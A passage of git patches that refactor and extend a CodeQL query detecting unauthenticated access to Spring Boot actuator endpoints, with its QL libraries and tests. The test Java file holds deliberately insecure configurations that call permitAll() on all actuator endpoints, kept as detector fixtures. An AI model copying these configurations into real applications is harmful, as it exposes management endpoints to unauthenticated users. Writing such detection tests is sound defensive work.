http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); - } - - protected void configure3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); - } - - protected void configure4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); - } - - protected void configure5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); - } - - protected void configure6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); - } - - protected void configure7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOk1(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOk2(HttpSecurity http) throws Exception { - http.requestMatchers().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOk3(HttpSecurity http) throws Exception { - http.authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOk4(HttpSecurity http) throws Exception { - http.authorizeRequests(authz -> authz.anyRequest().permitAll()); - } - - protected void configureOkSafeEndpoints1(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests(requests -> requests.anyRequest().permitAll()); - } - - protected void configureOkSafeEndpoints2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.to("health")).authorizeRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); - } - - protected void configureOkSafeEndpoints3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); - } - - protected void configureOkSafeEndpoints4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOkSafeEndpoints5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); - } - - protected void configureOkSafeEndpoints6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.to("health", "info")).permitAll()); - } - - protected void configureOkSafeEndpoints7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOkNoPermitAll1(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest()); - } - - protected void configureOkNoPermitAll2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOkNoPermitAll3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOkNoPermitAll4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); - } - - protected void configureOkNoPermitAll5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOkNoPermitAll6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint())); - } - - protected void configureOkNoPermitAll7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); - } -} diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref b/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref deleted file mode 100644 index ec49ecd718c2..000000000000 --- a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref +++ /dev/null @@ -1 +0,0 @@ -experimental/Security/CWE/CWE-016/SpringBootActuators.ql From 8064e8f1f9f9771784bb2a12b9cbc5d466fa4a64 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 19 Feb 2025 19:03:02 -0500 Subject: [PATCH 015/892] Java: convert tests to inline expectations --- .../security/SpringBootActuatorsQuery.qll} | 2 ++ .../CWE/CWE-016/SpringBootActuators.ql | 2 +- .../CWE-016/SpringBootActuators.expected | 7 ------- .../security/CWE-016/SpringBootActuators.qlref | 1 - .../CWE-016/SpringBootActuatorsTest.expected | 0 ...ators.java => SpringBootActuatorsTest.java} | 16 ++++++++-------- .../CWE-016/SpringBootActuatorsTest.ql | 18 ++++++++++++++++++ 7 files changed, 29 insertions(+), 17 deletions(-) rename java/ql/{src/Security/CWE/CWE-016/SpringBootActuators.qll => lib/semmle/code/java/security/SpringBootActuatorsQuery.qll} (98%) delete mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected delete mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected rename java/ql/test/query-tests/security/CWE-016/{SpringBootActuators.java => SpringBootActuatorsTest.java} (89%) create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll similarity index 98% rename from java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll rename to java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll index 195de7a1b8be..9aac9e4fc1a2 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll @@ -1,3 +1,5 @@ +/** Provides classes and predicates to reason about exposed actuators in Spring Boot. */ + import java /** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql index b700e691550f..c74c34284233 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql @@ -12,7 +12,7 @@ */ import java -import SpringBootActuators +import semmle.code.java.security.SpringBootActuatorsQuery from PermitAllCall permitAllCall where permitAllCall.permitsSpringBootActuators() diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected deleted file mode 100644 index f2874e3694d1..000000000000 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected +++ /dev/null @@ -1,7 +0,0 @@ -| SpringBootActuators.java:6:88:6:120 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:10:5:10:137 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:14:5:14:149 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:18:5:18:101 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:22:5:22:89 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:26:40:26:108 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:30:5:30:113 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref deleted file mode 100644 index abd5f2a75991..000000000000 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE/CWE-016/SpringBootActuators.ql diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java similarity index 89% rename from java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java rename to java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java index da59919fbe6c..71856f5c1a92 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java @@ -1,33 +1,33 @@ import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest; import org.springframework.security.config.annotation.web.builders.HttpSecurity; -public class SpringBootActuators { +public class SpringBootActuatorsTest { protected void configure(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator } protected void configure2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator } protected void configure3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator } protected void configure4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator } protected void configure5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator } protected void configure6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); // $ hasExposedSpringBootActuator } protected void configure7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator } protected void configureOk1(HttpSecurity http) throws Exception { diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql new file mode 100644 index 000000000000..f397fdb79aab --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql @@ -0,0 +1,18 @@ +import java +import semmle.code.java.security.SpringBootActuatorsQuery +import utils.test.InlineExpectationsTest + +module SpringBootActuatorsTest implements TestSig { + string getARelevantTag() { result = "hasExposedSpringBootActuator" } + + predicate hasActualResult(Location location, string element, string tag, string value) { + tag = "hasExposedSpringBootActuator" and + exists(PermitAllCall permitAllCall | permitAllCall.permitsSpringBootActuators() | + permitAllCall.getLocation() = location and + element = permitAllCall.toString() and + value = "" + ) + } +} + +import MakeTest From 8dfb920e051c3573fe0ca52c429408985bbaa6a3 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 20 Feb 2025 16:26:46 -0500 Subject: [PATCH 016/892] Java: refactor QL, move code to libraries --- .../java/frameworks/spring/SpringBoot.qll | 24 +++ .../java/frameworks/spring/SpringSecurity.qll | 59 ++++++ .../security/SpringBootActuatorsQuery.qll | 178 ++++++------------ .../CWE/CWE-016/SpringBootActuators.ql | 3 +- .../CWE-016/SpringBootActuatorsTest.ql | 3 +- 5 files changed, 142 insertions(+), 125 deletions(-) create mode 100644 java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll create mode 100644 java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll new file mode 100644 index 000000000000..864fc4bfcaff --- /dev/null +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll @@ -0,0 +1,24 @@ +/** + * Provides classes for working with Spring classes and interfaces from + * `org.springframework.boot.*`. + */ + +import java + +/** + * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. + */ +class TypeEndpointRequest extends Class { + TypeEndpointRequest() { + this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", + "EndpointRequest") + } +} + +/** A call to `EndpointRequest.toAnyEndpoint` method. */ +class ToAnyEndpointCall extends MethodCall { + ToAnyEndpointCall() { + this.getMethod().hasName("toAnyEndpoint") and + this.getMethod().getDeclaringType() instanceof TypeEndpointRequest + } +} diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll new file mode 100644 index 000000000000..3f11cc8d3ec8 --- /dev/null +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll @@ -0,0 +1,59 @@ +/** + * Provides classes for working with Spring classes and interfaces from + * `org.springframework.security.*`. + */ + +import java + +/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ +class TypeHttpSecurity extends Class { + TypeHttpSecurity() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", + "HttpSecurity") + } +} + +/** + * The class + * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. + */ +class TypeAuthorizedUrl extends Class { + TypeAuthorizedUrl() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", + "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") + } +} + +/** + * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. + */ +class TypeAbstractRequestMatcherRegistry extends Class { + TypeAbstractRequestMatcherRegistry() { + this.hasQualifiedName("org.springframework.security.config.annotation.web", + "AbstractRequestMatcherRegistry>") + } +} + +/** A call to `HttpSecurity.authorizeRequests` method. */ +class AuthorizeRequestsCall extends MethodCall { + AuthorizeRequestsCall() { + this.getMethod().hasName("authorizeRequests") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to `AuthorizedUrl.permitAll` method. */ +class PermitAllCall extends MethodCall { + PermitAllCall() { + this.getMethod().hasName("permitAll") and + this.getMethod().getDeclaringType() instanceof TypeAuthorizedUrl + } +} + +/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. */ +class AnyRequestCall extends MethodCall { + AnyRequestCall() { + this.getMethod().hasName("anyRequest") and + this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry + } +} diff --git a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll index 9aac9e4fc1a2..6ccfa39f3d63 100644 --- a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll @@ -1,58 +1,14 @@ /** Provides classes and predicates to reason about exposed actuators in Spring Boot. */ import java - -/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ -class TypeHttpSecurity extends Class { - TypeHttpSecurity() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", - "HttpSecurity") - } -} - -/** - * The class - * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. - */ -class TypeAuthorizedUrl extends Class { - TypeAuthorizedUrl() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", - "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") - } -} +private import semmle.code.java.frameworks.spring.SpringSecurity +private import semmle.code.java.frameworks.spring.SpringBoot /** - * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. - */ -class TypeAbstractRequestMatcherRegistry extends Class { - TypeAbstractRequestMatcherRegistry() { - this.hasQualifiedName("org.springframework.security.config.annotation.web", - "AbstractRequestMatcherRegistry>") - } -} - -/** - * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. - */ -class TypeEndpointRequest extends Class { - TypeEndpointRequest() { - this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", - "EndpointRequest") - } -} - -/** A call to `EndpointRequest.toAnyEndpoint` method. */ -class ToAnyEndpointCall extends MethodCall { - ToAnyEndpointCall() { - this.getMethod().hasName("toAnyEndpoint") and - this.getMethod().getDeclaringType() instanceof TypeEndpointRequest - } -} - -/** - * A call to `HttpSecurity.requestMatcher` method with argument `RequestMatcher.toAnyEndpoint()`. + * A call to `HttpSecurity.requestMatcher` method with argument + * `RequestMatcher.toAnyEndpoint()`. */ -class RequestMatcherCall extends MethodCall { +private class RequestMatcherCall extends MethodCall { RequestMatcherCall() { this.getMethod().hasName("requestMatcher") and this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and @@ -64,7 +20,7 @@ class RequestMatcherCall extends MethodCall { * A call to `HttpSecurity.requestMatchers` method with lambda argument * `RequestMatcher.toAnyEndpoint()`. */ -class RequestMatchersCall extends MethodCall { +private class RequestMatchersCall extends MethodCall { RequestMatchersCall() { this.getMethod().hasName("requestMatchers") and this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and @@ -72,86 +28,62 @@ class RequestMatchersCall extends MethodCall { } } -/** A call to `HttpSecurity.authorizeRequests` method. */ -class AuthorizeRequestsCall extends MethodCall { - AuthorizeRequestsCall() { - this.getMethod().hasName("authorizeRequests") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity - } -} - -/** A call to `AuthorizedUrl.permitAll` method. */ -class PermitAllCall extends MethodCall { - PermitAllCall() { - this.getMethod().hasName("permitAll") and - this.getMethod().getDeclaringType() instanceof TypeAuthorizedUrl - } - - /** Holds if `permitAll` is called on request(s) mapped to actuator endpoint(s). */ - predicate permitsSpringBootActuators() { - exists(AuthorizeRequestsCall authorizeRequestsCall | - // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall - or - // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall - | - // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - ( - this.getQualifier() instanceof AnyRequestCall or - this.getQualifier() instanceof RegistryRequestMatchersCall - ) - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - // [...].authorizeRequests().anyRequest().permitAll() - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - or - exists(AnyRequestCall anyRequestCall | - anyRequestCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = anyRequestCall - ) - ) - or - exists(AuthorizeRequestsCall authorizeRequestsCall | - // http.authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof VarAccess - | - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - this.getQualifier() instanceof RegistryRequestMatchersCall - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - ) - } -} - -/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. */ -class AnyRequestCall extends MethodCall { - AnyRequestCall() { - this.getMethod().hasName("anyRequest") and - this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry - } -} - /** * A call to `AbstractRequestMatcherRegistry.requestMatchers` method with an argument * `RequestMatcher.toAnyEndpoint()`. */ -class RegistryRequestMatchersCall extends MethodCall { +private class RegistryRequestMatchersCall extends MethodCall { RegistryRequestMatchersCall() { this.getMethod().hasName("requestMatchers") and this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry and this.getAnArgument() instanceof ToAnyEndpointCall } } + +/** Holds if `permitAllCall` is called on request(s) mapped to actuator endpoint(s). */ +predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { + exists(AuthorizeRequestsCall authorizeRequestsCall | + // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall + or + // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall + | + // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + ( + permitAllCall.getQualifier() instanceof AnyRequestCall or + permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall + ) + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + // [...].authorizeRequests().anyRequest().permitAll() + authorizeRequestsCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + permitAllCall.getQualifier() = registryRequestMatchersCall + ) + or + exists(AnyRequestCall anyRequestCall | + anyRequestCall.getQualifier() = authorizeRequestsCall and + permitAllCall.getQualifier() = anyRequestCall + ) + ) + or + exists(AuthorizeRequestsCall authorizeRequestsCall | + // http.authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof VarAccess + | + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + authorizeRequestsCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + permitAllCall.getQualifier() = registryRequestMatchersCall + ) + ) +} diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql index c74c34284233..bac0a72e1441 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql @@ -12,8 +12,9 @@ */ import java +import semmle.code.java.frameworks.spring.SpringSecurity import semmle.code.java.security.SpringBootActuatorsQuery from PermitAllCall permitAllCall -where permitAllCall.permitsSpringBootActuators() +where permitsSpringBootActuators(permitAllCall) select permitAllCall, "Unauthenticated access to Spring Boot actuator is allowed." diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql index f397fdb79aab..87044bb74dbc 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql @@ -1,4 +1,5 @@ import java +import semmle.code.java.frameworks.spring.SpringSecurity import semmle.code.java.security.SpringBootActuatorsQuery import utils.test.InlineExpectationsTest @@ -7,7 +8,7 @@ module SpringBootActuatorsTest implements TestSig { predicate hasActualResult(Location location, string element, string tag, string value) { tag = "hasExposedSpringBootActuator" and - exists(PermitAllCall permitAllCall | permitAllCall.permitsSpringBootActuators() | + exists(PermitAllCall permitAllCall | permitsSpringBootActuators(permitAllCall) | permitAllCall.getLocation() = location and element = permitAllCall.toString() and value = "" From b2469ff8baa1d249efc5b411443027b847b17ad5 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 20 Feb 2025 16:58:42 -0500 Subject: [PATCH 017/892] Java: add APIs and tests for more recent Spring versions: authorizeHttpRequests, AuthorizeHttpRequestsConfigurer, securityMatcher(s) --- .../java/frameworks/spring/SpringSecurity.qll | 29 +++- .../security/SpringBootActuatorsQuery.qll | 85 +++++++-- .../CWE-016/SpringBootActuatorsTest.java | 163 ++++++++++++++++++ .../annotation/web/builders/HttpSecurity.java | 28 +++ .../AuthorizeHttpRequestsConfigurer.java | 18 ++ 5 files changed, 306 insertions(+), 17 deletions(-) create mode 100644 java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll index 3f11cc8d3ec8..a8de07ca5bc7 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll @@ -15,12 +15,17 @@ class TypeHttpSecurity extends Class { /** * The class - * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. + * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer$AuthorizedUrl` + * or the class + * `org.springframework.security.config.annotation.web.configurers.AuthorizeHttpRequestsConfigurer$AuthorizedUrl`. */ class TypeAuthorizedUrl extends Class { TypeAuthorizedUrl() { this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", - "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") + [ + "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>", + "AuthorizeHttpRequestsConfigurer$AuthorizedUrl<>" + ]) } } @@ -34,7 +39,12 @@ class TypeAbstractRequestMatcherRegistry extends Class { } } -/** A call to `HttpSecurity.authorizeRequests` method. */ +/** + * A call to `HttpSecurity.authorizeRequests` method. + * + * Note: this API is deprecated and scheduled for removal + * in Spring Security 7.0. + */ class AuthorizeRequestsCall extends MethodCall { AuthorizeRequestsCall() { this.getMethod().hasName("authorizeRequests") and @@ -42,6 +52,19 @@ class AuthorizeRequestsCall extends MethodCall { } } +/** + * A call to `HttpSecurity.authorizeHttpRequests` method. + * + * Note: the no-argument version of this API is deprecated + * and scheduled for removal in Spring Security 7.0. + */ +class AuthorizeHttpRequestsCall extends MethodCall { + AuthorizeHttpRequestsCall() { + this.getMethod().hasName("authorizeHttpRequests") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + /** A call to `AuthorizedUrl.permitAll` method. */ class PermitAllCall extends MethodCall { PermitAllCall() { diff --git a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll index 6ccfa39f3d63..f3635912d5a4 100644 --- a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll @@ -6,7 +6,7 @@ private import semmle.code.java.frameworks.spring.SpringBoot /** * A call to `HttpSecurity.requestMatcher` method with argument - * `RequestMatcher.toAnyEndpoint()`. + * `EndpointRequest.toAnyEndpoint()`. */ private class RequestMatcherCall extends MethodCall { RequestMatcherCall() { @@ -18,7 +18,7 @@ private class RequestMatcherCall extends MethodCall { /** * A call to `HttpSecurity.requestMatchers` method with lambda argument - * `RequestMatcher.toAnyEndpoint()`. + * `EndpointRequest.toAnyEndpoint()`. */ private class RequestMatchersCall extends MethodCall { RequestMatchersCall() { @@ -40,18 +40,75 @@ private class RegistryRequestMatchersCall extends MethodCall { } } +/** + * A call to `HttpSecurity.securityMatcher` method with argument + * `EndpointRequest.toAnyEndpoint()`. + */ +private class SecurityMatcherCall extends MethodCall { + SecurityMatcherCall() { + this.getMethod().hasName("securityMatcher") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and + this.getArgument(0) instanceof ToAnyEndpointCall + } +} + +/** + * A call to `HttpSecurity.securityMatchers` method with lambda argument + * `EndpointRequest.toAnyEndpoint()`. + */ +private class SecurityMatchersCall extends MethodCall { + SecurityMatchersCall() { + this.getMethod().hasName("securityMatchers") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and + this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall + } +} + +/** + * A call to a method that authorizes requests, e.g. `authorizeRequests` or + * `authorizeHttpRequests`. + */ +private class AuthorizeCall extends MethodCall { + AuthorizeCall() { + this instanceof AuthorizeRequestsCall or + this instanceof AuthorizeHttpRequestsCall + } +} + +/** + * A call to a matcher method with argument + * `EndpointRequest.toAnyEndpoint()`. + */ +private class MatcherCall extends MethodCall { + MatcherCall() { + this instanceof RequestMatcherCall or + this instanceof SecurityMatcherCall + } +} + +/** + * A call to a matchers method with argument + * `EndpointRequest.toAnyEndpoint()`. + */ +private class MatchersCall extends MethodCall { + MatchersCall() { + this instanceof RequestMatchersCall or + this instanceof 